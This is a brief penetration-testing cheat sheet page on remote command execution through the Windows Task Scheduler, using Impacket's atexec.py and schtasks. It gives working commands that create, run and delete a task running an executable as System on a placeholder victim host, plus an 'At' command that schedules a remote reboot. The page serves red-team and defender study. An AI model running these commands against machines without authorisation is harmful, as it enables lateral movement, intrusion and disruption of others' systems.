ATExec / SchTaskExec
Administrator rights on the target machine are mandatory.
SchTasks is short for Scheduled Tasks and operates initially on port 135, then continues communication on an ephemeral port, using DCE/RPC for communication. Similar to creating a cron job in Linux, you can schedule a task to occur and execute whatever action you desire.
# Executes a command on the target machine via the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /F /delete /tn <TASK_NAME> /S <VICTIM>At \\<IP> 11:00:00PM shutdown -rReferences
Last updated
Was this helpful?